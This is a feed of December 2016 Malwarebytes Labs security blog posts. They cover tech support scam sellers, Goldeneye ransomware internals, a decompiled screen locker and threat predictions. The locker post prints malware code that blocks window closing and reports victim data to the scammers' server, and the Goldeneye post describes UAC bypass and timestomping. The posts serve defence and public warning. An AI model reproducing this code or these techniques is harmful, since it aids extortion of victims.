  • Contactless Payments: Addressing The Security Issues. “The emergence of contactless payments on mobile phones is changing the way transactions are authenticated and secured, says Jeremy King, international director of the PCI Security Standards Council. In a contactless environment, on mobile devices in particular, biometrics authentication can replace the need to use PIN entry as an additional authentication layer, King says in this interview conducted at Information Security Media Group’s recent Fraud & Breach Prevention Summit in London.” (Source: InfoRisk Today)
  • New ‘Giveaways’ Target Shoppers Searching For Hatchimals And Other Hot Toys. “During the holiday season, parents scrambling at the last minute to purchase toys at the top of their children’s wish lists will often go to great lengths to deliver. Scammers are taking advantage of this and are promoting fake Hatchimal giveaways to trick parents into disclosing bank information and other personal data, warns social media security company ZeroFOX. Fake coupons, merchandise and gift card generators are also being used to target shoppers.” (Source: Forbes)
  • Cerber Ransomware Spreads via Fake Credit Card Email Reports. “Just in time for the Christmas holiday shopping spree, the group behind the Cerber ransomware has launched a spam campaign that uses fake credit card reports to trick users into opening a Word file that under certain circumstances will download and install the deadly Cerber ransomware. Detected by the staff of the Microsoft Malware Protection Center, the emails in this spam campaign pretend to be pending payments for MasterCard credit cards.” (Source: Bleeping Computer)
  • Malvertising Campaign Targets Routers And Every Device Connected To Router. “Well this is just peachy – cybercriminals are actively using a malvertising campaign that infects routers and even Android devices. If the router is pwned, then every device connected to that router is pwned. Proofpoint researchers warned that cyber thugs are using a new and improved version of the DNSChanger exploit kit (EK) for this malvertising campaign. Generally, malvertising involves an attacker injecting malware into ads which can infect via browsers and attack a victim’s computer after simply visiting an affected page.” (Source: Computer World)

Safe surfing, everyone!

The Malwarebytes Labs Team

Categories: Techie Feeds

Scam as a service 2: the B team

Malwarebytes - Mon, 12/19/2016 - 19:00

It’s easy to run into mentions of the Darknet and its many ills, real or imagined. Even the late CSI: Cyber made frequent reference to the Darknet. Interest in Tor based threats is increasing to the extent that some vendors will scoop up all activity they find on Tor and provide you a nice front end to search through it at your leisure. This might lead the casual observer to assume that the darkness is a one stop shop for cyber threats, but criminals existed on the internet prior to Tor, and still do quite well for themselves without it. In fact, bad guys with good OPSEC tend to be the exception, rather than the rule. So let’s take a quick look at some unpleasant stuff and the nadir of bad OPSEC, Facebook.

We’ve blogged previously on the Scam in a Box.  But more common are bad guys simply selling lock screens, phone support lead generation, or both.

These posts are fairly common, leading some criminals to differentiate their offerings with custom tooling as follows:

Following along the trend we’ve observed, of the higher tier scammers escalating tactics to stay ahead of enforcement measures, “Windows activation” calls are seeing a surge in popularity. The PPI, or Pay Per Install, referred to below is a great way of driving victim calls to your call center without any web based infrastructure that can be used to track you down later.

But what about ad networks cracking down on tech support scams? What about popular search engines disallowing third party tech support sites in their rankings at all? How could such a thriving criminal marketplace exist under these conditions? Well, it largely doesn’t. A significant portion of these postings are themselves scams, designed to take a criminal’s money in exchange for a non-functional product, or sometimes nothing at all. Here’s a post linked from a public Facebook profile.

Things wrong with this picture:

  1. Google adwords banned these sorts of campaigns years ago.
  2. The poster doesn’t seem to understand why you might need to rotate account details when promoting something harmful/illegal.
  3. 500 is about 7.50 USD. If Rs.60000 was insufficient to evade Google counter-fraud measures, it seems improbable that the price of a cup of soup could buy you better service.
  4. The poster included his name and contact information at the bottom of the post. (not pictured)

Why is this sort of thing trivially easy to find? To hazard a guess, most large platform content security monitoring is done algorithmically, with a weighted list of phrases and words that elevate items to a human analyst. Doing so with tech support scams runs a huge chance of false positives flagging legitimate outsources services centers. In all probability, a human security analyst never sees any of these posts and therefore can’t act against them.

So to sum up, tech support scams have a robust tooling and infrastructure market, out in the open with no obfuscation whatsoever. Some scammers will specify Indian clients only as a crude way of vetting, but most don’t. They operate profitably and with impunity, based largely on a belief that distance from the United States makes them untouchable. Also, based on the frequency and vehemence of “BPO Scammer” posts, a not-insignificant minority seem to believe that what they’re doing isn’t actually illegal. Suffice it to say, Malwarebytes disagrees.

Categories: Techie Feeds

Tech support scams, stolen data, and botnets

Malwarebytes - Thu, 12/15/2016 - 19:00

NOTE: thanks to the Wack0lian for research contributions

 

It would seem that scams as a service are a growth business model.  Last time, we looked at inboundpopaps[.]info, a slick scam in a box designed to get even the most technically illiterate criminals up and running and stealing from you. Today we’ve found something a little more interesting – a scam in a box company that also offers intelligence leads. That is, they’ll sell you the scam and point you at the most vulnerable targets first.

In July of 2014, someone posting under the name BPO Resources posted the following on an outsourced IT services forum.

Typically tech support callers are noted for not knowing the slightest thing about the people they call, so targeted leads for specific company customers was interesting. Almost identical verbiage appears on bpoexpertsglobal.blogspot.com.

This time though, the threat actor also has on offer the personal data of elderly customers of ISPs as well. This was less surprising, as scammers of all sorts prefer to victimize the elderly. Given that this guy appears to be diversifying his crime verticals, what might he be offering more recently? Searching for BPO Experts Global provided a Youtube channel of the same name where the scammer is kind enough to demonstrate his screen locker that’s currently for sale. (We’ve written about these lockers here). If you’ve been hit by this sort of thing, be sure to check out our forums for removal guides. Let’s allow the scammer to speak for himself for a minute:

“this is the software which I have created”

“Going now to the secure, bulletproof server”

 

Here’s the back end login panel, with a fun graphic when you enter an incorrect password.

 

 

And here we have the panel itself, where the author brags about being able to trigger popups, invisible URLS, and download an execute exes on the victim’s machine, all without any UAC alerts on a Windows machine. A botnet, in other words. So we have a threat actor progressing from selling leads, to selling stolen data, to selling screen lockers in support of other scammers. But who is this guy and how does he have Dell customer data? Lets start with where he is.

While infecting himself with his own product, he forgot to blank out his own IP, which is registered to a broadband company in Bangalore. The footnote at the bottom of the panel says “Accelerit Solutions”, which yields a homepage of systemnetworksecure.com.  The site and its phone number show up in extensive comment spam and various tech support scam pitches, but does not offer up any personal details. Searching directly on the company name is more interesting.

He apparently also doesn’t play nice with his customers, as we can see in reference to a previous iteration of his site. If you’ll recall, BPOresources was the name of the account that made the original forums posting in 2014.

And lastly, he’s a member of a Facebook group that openly sells pre-fab tech support scam pages.

So we have a pretty good idea of who’s behind BPO Experts Global. But how did they get the Dell customer data? Well, possibly several ways. Back in January, Ars technica wrote about a wave of tech support scam calls targeting Dell customers with apparently accurate purchase information. That article referenced a vulnerability disclosed 11/25/2015 here (followup here) involving a vulnerable preinstalled certificate that can be used to leak a Dell owner’s service tag. Brian Krebs followed up citing the same vulnerability, and referencing an ongoing Dell investigation.

Mr. X didn’t necessarily have to make use of the vulnerability himself. Tech support scammers are renowned for their quick sharing of TTPs and presumably once one scammer gained access to Dell customer data, he quickly sold and resold it to others. Given that the original forum post was dated 2014, its likely that the data cache is widely available on the underground in India. Although, as we’ve seen above, scammers largely feel free to conduct their business in the open, on US social media and in English.

Mr. X’s tech support botnet is not the first we’ve seen. He falls into a trend we’ve observed recently of the more enterprising scammers adapting to changing search engine policies banning remote tech support listings and upgrading their techniques to more sophisticated, more damaging methods that closely resemble established malware. As the less technically adept criminals get squeezed out, it’s reasonable to expect that we’ll see the remaining scammers improve, adapt, and overcome.

Categories: Techie Feeds

Goldeneye Ransomware – the Petya/Mischa combo rebranded

Malwarebytes - Thu, 12/15/2016 - 16:00

From March 2016 we’ve observed the evolution of an interesting low-level ransomware, Petya – you can read about it here. The second version (green) Petya comes combined with another ransomware, packed in the same dropper – Mischa. The latter one was deployed as an alternative payload: in case if the dropper was run without administrator privileges and the  low-level attack was impossible. This combo is slowly reaching its maturity – the authors fixed bugs that allowed for decryption of the two earliest versions. Now, we are facing an outbreak of the fourth version – this time under a new name – Goldeneye, and, appropriately, a new, golden theme.

In this post we will take a look inside, in order to answer the question of whether or not any internal changes followed the external alterations.

Analyzed sample

// special thanks to @procrash

Distribution

Currently Goldeneye is distributed by phishing e-mails, in campaigns targeting Germany. The same pattern of distribution was observed in first editions of Petya ransomware. Germany seems to be an environment familiar to this ransomware author (who is probably a German native speaker) and his testing campaigns are always released in this country. However, the threat will probably go global again, as the affiliate program for other criminals is going to be released soon.

Behavioural analysis

After being run, the malware installs its copy in the %APPDATA% directory, under the name of a random application found in the system:

The installed copy is automatically executed and proceeds with malicious actions.

In the past, the dropper of Petya/Mischa used to trigger a UAC popup window. If the user had agreed to run the sample as the Administrator, he/she was attacked by the low-level payload: Petya. Otherwise, the high-level Mischa was deployed.

In the current case the model of the attack is different and looks more like a case of Satana ransomware.

First, the high-level attack is deployed and the files are encrypted one by one. Then, the malware tries to bypass UAC and elevate its privileges by its own, in order to make the second, attack, this time at low-level: installing Petya at the beginning of the disk. The bypass works silently if the UAC is set to default or lower. In cases where the UAC is set to max, the following window pops up repeatedly, till the user accepts the elevation:

The used bypass techniques works on both –  32-bit and 64-bit – versions of Windows, up to Windows 8.1. On Windows 10, even if the UAC is set to default a popup is displayed – but not revealing the real name of the infecting program, i.e.

 The high-level part (former Mischa)

On the first stage of the attack, files are being encrypted one by one. The malware drops the following note in TXT format:

Files that are encrypted and added random extensions:

If we have two files with the same plaintext they turn into two different cipher-texts – that indicates that each file is encrypted with a new key or initialisation vector. The high entropy suggests AES in CBC mode (just like in previous editions of Mischa).

Visualization – original file vs encrypted one:

 

The low-level part (former Petya)

The second stage of infection is deployed after encrypting the files. The behaviour of second payload is no different than in the previous versions of Petya. After the malware is deployed, system crashes and starts with a fake CHKDSK. It pretends to be checking the disk for errors, but in reality it performs Master File Table encryption, using Salsa20. After it is completed, we are facing a familiar blinking skull – this time in yellow/golden color:

After pressing a key, we can see the screen with the ransom note:

Page for the victim

On every edition all the pieces of the ransomware had a consistent theme. This time is no different. The page for the victim, that is hosted on a Tor-based site comes in very similar theme like the ransomware itself:

After paying the ransom, the victim is provided with a key to decrypt the first (bootlocker) stage and a decrypter to recover the files:

The decrypter requires having a proper key in order to work:

Affiliate program

In the past, Petya/Mischa combo was available as RaaS (Ransomware as a Service). Following the changes in the layout, the Twitter account associated with the criminal(s) behind the malware, also changed the theme of the profile, and updated the information about the affiliate program status:

It confirms that the actor behind Goldeneye as well as the methods of redistributing it didn’t change.

Inside

This ransomware is very complex, having multiple pieces that have already been described in our previous articles. That’s why, in this one we will focus only on the differences comparing to the previous editions. Let’s start from the core.dll, that is the PE file that we get after unpacking the first layer.

The core.dll

Just like in the previous versions, the main application is a DLL (core.dll), packed by various crypters and loaded by a technique known as Reflective Loader.

In the past Petya and Mischa were two separate modules delivered by this DLL. The dropper was deciding which one of them to deploy, by making an attempt to run the sample with Administrator privileges – no UAC bypass was used, only social engineering. Now, however, it comes with two DLLs that perform UAC bypass – one for 32 bit and another for 64 bit variant of Windows. It decides which one to deploy, basing on the detected architecture.

The internal logic of this module changed a bit. There is no Mischa.dll separated. Instead, the core.dll covers the functionality of encrypting files as well as of installing disk locker afterwards. The payloads are XOR encrypted and stored in the last section of the PE file (.xxxx):

Section .xxxx contains:

  • the low level part (former Petya)
  • 32 bit DLL (elevate_x86.dll)
  • 64 bit DLL (elevate_x64.dll)

(The two DLLs used to UAC bypass are based on the technique similar to the one described here.)

At first run, the core module makes its own copy into %APPDATA% and applies some tricks to blend into the environment:

  • Choosing the application name at random, out of various applications in System folder
  • Changing own timestamp to the timestamp of Kernel32.dll (the so called “timestomping” technique).
  • Adding to its resources the resource of the genuine Microsoft application, under which name it is installed:

Result:

Some of those tricks remind us of Cerber ransomware and they were probably inspired by it.

Then, the dropper deploys the installed copy and proceeds with encryption.

The file cryptor (former Mischa)

The file cryptor feature is now implemented inside the core.dll.

It behaves similarly to the former Mischa ransomware – the only difference is that now it is employed before the low-level attack, rather than being an alternative.

Attacked targets

Files are attacked with the following extensions:

doc docx docm odt ods odp odf odc odm odb xlsm xlsb xlk xls xlsx pps ppt pptm pptx pub epub pdf jpg jpegB rtf txt frm wdb ldf myi vmx xml xsl wps cmf vbs accdb cdr svg conf cfg config wb2 msg azw azw1 azw3 azw4 lit apnx mobi p12 p7b p7c pfx pem cer key der mdb htm html class java cs asp aspx cgi h cpp php jsp bak dat pst eml xps sqllite sql js jar py wpd crt csv prf cnf indd number pagesN po dcu pas dfm directory pbk yml dtd rll cert p12 cat inf mui props idl result localstorage ost default json db sqlite bat x3f srw pef raf orf nrw nef mrw mef kdc dcr crw eip fff iiq k25 crwl bay sr2 ari srf arw cr2 raw rwl rw2 r3d 3fr ai eps pdd dng dxf dwg psd ps png jpe bmp gif tiff gfx jge tga jfif emf 3dm 3ds max obj a2c ddspspimage yuv 3g2 3gp asf asx mpg mpeg avi mov flv wma wmv ogg swf$ ptx ape aif wav ram ra m3u movie mp1 mp2 mp3 mp4 mp4v mpa mpe mpv2 rpf vlc m4a aac aa aa3 amr mkv dvd mts qt vob 3ga ts m4v rm srt aepx camproj dash zip rar gzip vmdk mdf iso bin cue dbf erf dmg toast vcd ccd disc nrg nri cdi Encryption

Files are read in chunks, each is 1024 bytes long. Then, they are processed by the built-in implementation of AES.

The easiest way to analyse the encryption algorithm used, is by reversing the original decrypter, provided by the ransomware author to victims that paid the ransom. The decrypter is written in .NET and not obfuscated.

Looking at the decrypter code we can confirm that each file is encrypted using AES in CBC mode. The AES key is 32 byte long, and it is the taken from the beginning of SHA512 hash of the password.

The initialisation vector is random for every file and it is stored in its content:

The disk locker (former Petya)

This part of the Goldeneye ransomware is written at the disk beginning and is independent from the operating system. It is made up of a bootloader and a tiny, 16-bit kernel. At the very first sight we can suspect, that it is nothing more than a refactored Petya. That’s why, for the simplicity I will refer this part as Petya Goldeneye.

Indeed, comparing the current edition with Petya 3 (described here) we can see, that the encryption algorithm and the codebase hasn’t changed. Yet, we can spot some differences.

Encryption

All versions of Petya use Salsa20 to encrypt MFT. In the current edition, the implementation of Salsa20 is identical like in the former version.

See the BinDiff screenshot below – Petya Goldeneye vs Petya 3:

We can safely assume, that just like in the previous case the Salsa20 has been implemented correctly – means, this edition of Petya is not decryptable by external tools.

What has changed in the code?

Although the main parts of the code didn’t change, still we can notice that some refactoring has taken place:

The most important changes are about the way in which the encryption/decryption is applied. The author added more checks and simplified the decryption function. Yet, the changes are rather about improving the code quality rather than introducing some new ideas.

Layout

Just like in the previous cases, Petya’s code is written at the beginning of the disk – however, now the layout is more compact. The code of Petya’s kernel starts just after MBR, without any padding. Due to this, other important sectors are also shifted. For example, the data sector, where the random salsa key is saved*, is now placed in sector 32:

* just like in all previous editions, this key is erased after use. Read more about the full procedure here.

Summing up, all the sectors are shifted towards the beginning of the disk.

Data sector:

  • Petya3: 54
  • Petya Goldeneye: 32

Verification sector:

  • Petya3: 55
  • Petya Goldeneye: 33

Original MBR (xored with 7)

  • Petya3: 56
  • Petya Goldeneye: 34
Conclusion

Goldeneye ransomware is yet another step in the development of the Petya/Mischa bundle. The redesigned dropper coupled both elements together in a new way, that makes it even more dangerous. At the current stage the product doesn’t seem decryptable by external tools. We strongly advise to be very vigilant about opening e-mail attachmentx, because this is still the main way of distribution of this ransomware.

During the tests, Malwarebytes has proven to protect against the malicious payloads deployed by Goldeneye phishing e-mails:

This was a guest post written by Hasherezade, an independent researcher and programmer with a strong interest in InfoSec. She loves going in details about malware and sharing threat information with the community. Check her out on Twitter @hasherezade and her personal blog: https://hshrzd.wordpress.com.

Categories: Techie Feeds

A closer look at a tech support screen locker

Malwarebytes - Wed, 12/14/2016 - 19:00

In this blog post, we are going to take a closer look at some of the code that the most predominant family of tech support screen lockers are currently using to frustrate their victims. This, which is dubbed VinCE because of the Program folder it creates for itself, is compiled in Microsoft Intermediate Language (MSIL), making it easier to read for those of us that are not that versed in reverse engineering.

Background

This screen locker is designed to make the victims desperate enough to call the displayed number and ask for help. At which point, they are expected to pay a lot of money for minimal effort. Running the main executable (SBSCP.exe) on any Windows system results in a blue screen like the one shown below. The goal of the programmer is to frustrate the efforts of getting rid of the screen, at the same time, provide the tech support scammers with an option to get rid of it easily.

Don’t think that the blue screens are tailored for Windows versions. The above fake BSOD is displayed on any current Windows system, regardless of version. In fact the above screenshot was taken on a Windows 7 machine.

The code

Let’s take a look at some code snippets. First, the ones that produce the content of the blue screen:

When you are first confronted with that blue screen, you can’t help but wonder what will happen when the completion percentage value reaches 100%. But looking at the code that controls this, full completion never happens. Because that’s all it is: a counter.

Random random = new Random();
this.intTotalCount = random.Next(25, 50);
this.intCount = 0;
this.growLabel1.Text = "Your PC ran into a problem and needs to restart. We're just collecting some error info, and then we'll restart for you.";
this.growLabel2.Text = this.intCount.ToString() + "% complete";
this.timer1.Interval = 500;
this.timer1.Enabled = true;

The most important thing we can learn from the above is that the percentage completion value shown in the screen locker stops somewhere between 25 and 50, most likely to egg the user to call the phone number.

The rest of the text in the display, including the phone number, are put together in these lines of code:

text = "1-888-523-2979";
string str = "AAAAA";
this.growLabel3.Text = "For more information about this issue and possible fixes";
this.growLabel4.Text = "Call TOLL FREE \"" + text + "\" give them this info ";
this.growLabel5.Text = "Stop Code: CRITICAL_PROCESS_DIED";
this.growLabel6.Text = "Error Code : 0x000" + str;
this.blnFormUpdate = this.updateinstalls(text);

Now—a more interesting part—how do they keep users from closing the screenlock forms and from shutting down the computer while these forms are active.

Actually, this is (probably) surprisingly easy. In the code below, Form1 is the lockscreen, and this bit—

private void Form1_FormClosing(object sender, FormClosingEventArgs e)
{
if (!this.blnClose)
{
e.Cancel = true;
}
}

—translates as: cancel any event that tries to close this form except if this.blnClose is TRUE. Seeing this sent me looking, because obviously I wanted to know when this statement would be true. And I found that in the code shown below:

Taking out the relevant part for our quest gives us the code below. It show us that if we use the F6 key, then this.blnClose becomes true, and it closes the program. Mission accomplished.

private void Form1_KeyDown(object sender, KeyEventArgs e)
{
if (e.KeyCode.ToString().ToLower() == "f6")
{
this.blnClose = true;
base.Close();
}
}

But there is one more thing I wanted to point out. As you can see from the code below, the program prepares a SOAP message to communicate a user ID and the displayed phone number back to a server, which happens to host a known PUP called SPC Optimizer.


string url = "http://spcoptimizer.com/servicenew/updateinstall.asmx";
string action = "http://tempuri.org/UpdateBRN";
strPhoneNumber += "_DOSB_8";
XmlDocument soapEnvelopeXml = Form1.CreateSoapEnvelope(strId, strPhoneNumber);
HttpWebRequest httpWebRequest = Form1.CreateWebRequest(url, action);
Form1.InsertSoapEnvelopeIntoWebRequest(soapEnvelopeXml, httpWebRequest);

Summary

As a demonstration of how tech support scammers operate and try to lure victims into calling their number, we have shown you some snippets of the code.

We especially highlighted relevant pieces of the code to show easy solutions that tech support scammers have created for themselves to get rid of the lock screen and who may be the actors behind the malware.

File details

SBSCP.exe – SHA256 1e4fd5500eaf819e8b8e949634a38fccc8159668b205165a565e2530b2870cfc

A full removal guide for this Tech Support Scam can be found on our forums.

Malwarebytes detected the executable as Trojan.TechSupportScam.

Note that there is at least one slightly different variant of this one, displaying another phone number (see header of this post).

The Web Protection module included in the Premium version of Malwarebytes blocked the contacted domain, as you can see from the screenshot below:

As always: Save yourself the hassle and get protected.

Pieter Arntz

Categories: Techie Feeds

Security in 2017: Ransomware will remain king

Malwarebytes - Wed, 12/14/2016 - 17:00

2016 was the year of ransomware, with hackers focusing their attention on exploiting Internet users and businesses around the world for profit. According to the FBI, cyberextortion losses have skyrocketed and ransomware was on track to become a $1 billion a year crime in 2016.

Our research shows no sign of this security nightmare slowing down in 2017. Hackers are becoming more advanced, and ransomware remains an incredibly easy, lucrative way for them to make money. Unfortunately, the security community has only started to develop defenses that can protect Internet users from ransomware.

With the new year around the corner, security researchers at Malwarebytes Labs have compiled a list of predictions that encompass what new ransomware threats, developments, and opportunities they expect consumers and businesses will face in 2017.

Ransomware will become personal.

 Most ransomware attacks today are indiscriminant. For the most part, cyber criminals issue ransomware at random, hitting anyone and everyone that they can. However, it’s increasingly likely that targeted ransomware attacks will become the new norm. If an attacker can recognize the difference between an enterprise and a consumer target, they will be able to adapt their ransom demands to match their victims. The intentions of attacks are also likely to become more personal. In addition to encrypting files, ransomware attackers will soon be threatening to post data or information on social media, or to expose it in an equally destructive way. As with most cyber attacks, ransomware will grow to take advantage of more human vulnerabilities.

Ransomware protection will become an investment.

Until this past year, companies and consumers had few solutions available to them to help detect and fight ransomware. Security researchers have been working hard to find decryptors of specific ransomware types so that they can effectively protect against them in the near future. However, when a ransomware descriptor is recognized, ransomware authors often tweak their attacks to avoid detection. As this cat and mouse game between security researchers and ransomware creators continues, more security vendors will debut anti-ransomware protection offerings. In fact, we predict that by the end of 2017 at least 50% of security companies will release some sort of ransomware detection and/or prevention software. Companies and consumers will both find themselves investing in new anti-ransomware security software in 2017.

Password managers will become a huge target.

In 2017, password managers, digital vaults where users store passwords and other authentication data, will become a huge target for cybercriminals. In fact, just last month, it was revealed that Apple’s new iOS 10 operating system has a potential security hole that could help hackers get access to passwords and other sensitive information. Hackers are apparently able to infiltrate Apple’s Keychain password manager. For a hacker, breaking into a network such as this can be incredibly fruitful. The top password managers are likely to find themselves under attack in 2017.

Attackers will pick pocket the digital wallet.

With the growth of financial and budget planning applications; increased pervasiveness of new payment methodologies such as Apple Pay adding new wrinkles (such as making online payments through the phone); and the growing pervasiveness of cryptocurrencies (like Bitcoin, Litecoin, and Peercoin), there will be increasing attacks against applications, plugins, digital wallets, and the companies holding authentication data allowing access to these digital currency streams. With the incremental adoption of each of these technologies, the potential windfall from a dedicated attacker increases. Soon it will be more than enough to attract organized criminals who previously flocked to the banking Trojans of the past. In fact, the first attacks may evolve from the original Zeus source code, the granddaddy of banking Trojans.

A new exploit kit will emerge as the top dog.

In recent months, we have witnessed several trends that hint that existing malware attacks are going “back to the basics.” For example, there has been a rise in the spread of malware attacks through email and phishing, while more sophisticated malvertising and exploit kit attacks have decreased. Companies and consumers have figured out how to block Java and Flash and are moving to HTML5, making it harder for the existing exploit kits to succeed in deploying malware through malvertising.

Since Angler EK disappeared in June 2016, several other exploit kits have been battling for the top spot. An underdog, RIG EK is now positioned to be the new leader, but it still relies on older vulnerabilities, all of which are easily prevented today. This opens up a massive opportunity for a new, sophisticated and dangerous exploit kit to emerge in the next year.

Malware will become engrained in tech support scams and attacks will increase, globally.

Tech support scams (TSS) have become incredibly advanced and dangerous over the last few years and most recently we have witnessed TSS deploying malware, and even extortionware. In 2017, TSS attackers will dive into this benefit headfirst and leverage the malware threat landscape more than ever before.

The IoT will thrust DDoS attacks into a new era.

In 2017, the Internet of Things (IoT) will perpetuate an evolution in how DDoS attacks are orchestrated. In September of 2016, we saw a DDoS attack like never before. Security blogger Brian Krebs found himself under attack by the biggest DDoS attack ever recorded, and sources emphasized that CCTV cameras wired to the Internet and other unsecured connected devices were leveraged by attackers to orchestrate the attack. Based on the sheer volume of devices that we have connected to the Internet today, the very real challenge of not being able to update or secure their firmware and the ease in which these devices can be identified using both general (Google) or specialized (Shodan) search, the possibilities for DDoS attackers have exploded. We anticipate that we will see increasing attacks like the one that targeted Krebs, perhaps even targeting critical infrastructure such as the power grid or government communications

Security will be the #1 priority for the boardroom.

In 2017, we anticipate that more security professionals will be asked to join company boards. The need to have someone technical with a background in security on your board is currently at an incredibly hire premium—across all industries. This will only continue to grow over the next year, as we continue to watch it evolve as one of the top business and political priorities of our age.

Categories: Techie Feeds

Ransomware tries its hand at being a deadly viral meme

Malwarebytes - Tue, 12/13/2016 - 17:06

Memes are weird things and weren’t always about lolcats or frogs or whatever the latest terrible image macro doing the rounds happens to be. I quite like this line from Wikipedia on said subject:

Proponents theorise that memes are a viral phenomenon that may evolve by natural selection…Memes that propagate less prolifically may become extinct, while others may survive, spread, and (for better or for worse) mutate.

The plot of The Ring is pretty much the concept of a meme made deadly – pass on this cursed videotape within 7 days, or you die horribly.

How far will you go to save yourself?

Well, our old friend 2016 is here to ask that question one more time, because ransomware authors have decided to tweak their victim’s get out of jail method. Don’t have the funds to obtain an unlock key? No problem – just infect two people and you’re back in business (assuming they pay up to unlock their own files). It’s all gone a bit pyramid scheme, hasn’t it?

Interestingly, the time limit to regain your files is the same as the time limit imposed on potential victims of Sadako: seven days.

The only way that could be creepier is if they’d released this during Halloween.

Named after the well known BitTorrent client Popcorn Time, this file goes one step further than most in a mission to make some money. It encrypts files in the usual places – Documents, Music, Pictures and Desktop – and targets pretty much every file extension under the sun. After encryption, the splash screen explaining what’s happened claims the creators are from Syria and that money generated from the ransomware will be used for “food, medicine, and shelter”.

At this point, the choices available boil down to randomly entering a key to unlock the files (not a good idea, as there is mention in the source code that incorrect key entry may eventually result in automatic file deletion), or to play the game and begin the process of infecting other people, in the hopes of obtaining an unlock key.

Note that it isn’t enough to infect another person – you have to hope they pay the ransom too, or they don’t count as a notch on your tally of victims.

All of this only works on the assumption that the ransomware authors will actually provide an unlock key and that is certainly up for debate. It’s also probable that victims won’t want to risk friendships so they’ll end up trolling for random victims in chat rooms, social media and other fish in a barrel locations. In other words, like common or garden script kiddies going about their daily business.

What a mess!

As Graham Cluley mentions, you don’t want to risk getting into trouble with the law because you decided to save yourself by torching the data of others. Should you fall victim to a piece of ransomware, don’t give up hope – many of these files are poorly coded and in many cases, members of the security community, independent researchers, security firms, and more besides manage to come up with decryption tools.

Meanwhile, users of Malwarebytes 3.0 will find we detect this as Ransom.FileCryptor.

Christopher Boyd

Categories: Techie Feeds

A week in security (Dec 04 – Dec 10)

Malwarebytes - Mon, 12/12/2016 - 23:29

Last week we launched Malwarebytes 3.0, our next-generation antivirus replacement.

We also touched on domain generating algorithms (DGA), went up-close and personal with a rootkit, and featured a fake “smart drug” news story.

Lead Malware Intelligence Analyst Jérôme Segura reported on another malvertising campaign, about which the group behind it is identified as AdGholas.

Below are notable news stories and security-related happenings:

  • Disttrack Wiper Malware Hits Saudi Arabia’s Aviation Agency. “Shamoon attackers with their Disttrack wiper malware have hit Saudi Arabian entities again. The Saudi government confirmed the latest breaches on Thursday, and for now the identity of only one target has been revealed: the country’s General Authority of Civil Aviation (GACA), which is the national institution in charge of aviation and related matters, as well as the operator of four international and 23 domestic airports within the country.” (Source: Help Net Security)
  • Exploit Company Exodus Sold Firefox Zero-Day Earlier This Year. “This week, an exploit was publicly distributed that could break into the computers of those using the Tor Browser or Firefox. The Tor Project and Mozilla patched the underlying vulnerability on Wednesday. One research company gave details of the exploit method used to a defensive cybersecurity firm last year so it could protect its own clients’ systems. In turn, the exploit research company went on to sell details of the recent Firefox vulnerability to another customer for offensive purposes this year, according to two sources.” (Source: Vice’s Motherboard)
  • Ransomware As A Service Fuels Explosive Growth. “Believe it – you too can become a successful cyber criminal! It’s easy! It’s cheap! It’s short hours for big bucks! No need to spend years on boring things like learning how to write code or develop software. Just download our simple ransomware toolkit and we can have you up and running in hours – stealing hundreds or thousands of dollars from people in other countries, all from the comfort of your home office – or your parents’ basement. Sit back and watch the Bitcoin roll in!” (Source: CSO)
  • Researchers Warn Of Visa Payment Fraud Gaps. “Researchers have warned that deficiencies in Visa’s e-commerce payment network could allow attackers to brute force credit card details in as little as six seconds. A paper from Newcastle University’s Mohammed Aamir Ali, Budi Arief, Martin Emms and Aad van Moorsel describes how they were able to launch a “distributed guessing attack” against Alexa top-400 online merchants’ payment sites to work out expiry dates and CV2 values.” (Source: InfoSecurity Magazine)
  • The Flowering Of Voice Control Leads To A Crop Of Security Holes. “‘Tis the season of cybersecurity threat predictions for 2017. Vendors’ glossy reports shower onto the desks of customers and journalists like gentle Christmas snow. But so many of these reports, like so many snowfalls, are nothing but slush. All year we’ve been hearing about the spreading plague of ransomware, and how the Internet of Things (IoT) will be a security nightmare. Remember the botnet made of video cameras? Vendors have been waving around phrases like ‘artificial intelligence’ and ‘machine learning’ and ‘threat intelligence sharing’ like magic wands.” (Source: ZDNet)
  • Facebook, Microsoft, Twitter And YouTube Team To ID Terror Content. “Facebook, Microsoft, Twitter and YouTube have teamed up to share their expertise spotting terrorism-related content, in order to crimp its spread. The four put their name to a joint statement in which they declare ‘There is no place for content that promotes terrorism on our hosted consumer services.'” (Source: The Register)
  • Reality Check: Getting Serious About IoT Security. “In an effort to curtail a new and disturbing cyberattack trend, the Department of Homeland Security has placed Internet of Things (IoT) device manufacturers on notice. The recent proclamation clarified how serious the agency is about the issue and how serious it wants corporate decision makers to be. In short, the DHS “Strategic Principles for Securing the Internet of Things” acknowledges the gravity of the current climate and the potential for greater harm by encouraging security to be implemented during the design phase, complete with ongoing updates based on industry best practices.” (Source: Dark Reading)
  • Verizon: Unknown Assets A Hacker’s Playground. “Service Provider & Enterprise Security Strategies — Merger and acquisition activity may be financially rewarding but it can actually create and contribute to enterprise security risks, Verizon Enterprise Solutions’ Christopher Novak warned today. The Risk Team director said many data breaches, including some that last for months, have targeted assets that are networked but not covered by company security solutions, often because the corporation is unaware of their existence.” (Source: Light Reading)
  • What Role Does Privacy Play In Your Digital Transformation Strategy? “If you are a senior leader in an organisation, I am sure you have been asked the question – ‘What is your digital strategy?’ You may also be getting tired of people telling you that new market entrants (especially millennials) are disrupting traditional business models and are forcing you to redefine the end to end customer experience. And here is another good one -‘Have you hired a digital transformation executive yet?’ While I make light of all the digital hype, this transformation is not a joke – it is a survival necessity.” (Source: IT Security Guru)
  • Call For Privacy Probes Over Cayla Doll And i-Que Toys. “The makers of the i-Que and Cayla smart toys have been accused of subjecting children to ‘ongoing surveillance’ and posing an ‘imminent and immediate threat’ to their safety and security. The accusations come via a formal complaint in the US by consumer groups. They, along with several EU bodies, are calling for investigations into the manufacturers.” (Source: The BBC)
  • Hackers Launch Stealth Malvertising Campaign Exposing Millions Online To Spyware And More. “Millions of internet users visiting popular news sites over the past few months may have been exposed to a malicious malvertising campaign. The cybercriminals behind the campaign are distributing malicious ads, which redirect users to the Stegano exploit kit. Security researchers uncovered that the Stegano malvertising campaign, exploited several Flash vulnerabilities. The malicious ads came embedded with attack codes within individual image pixels. Stegano has been active since 2014, however, researchers noted a fresh campaign launched in October, which operates in an exceedingly stealthy manner to infect victims.” (Source: The International Business Times)
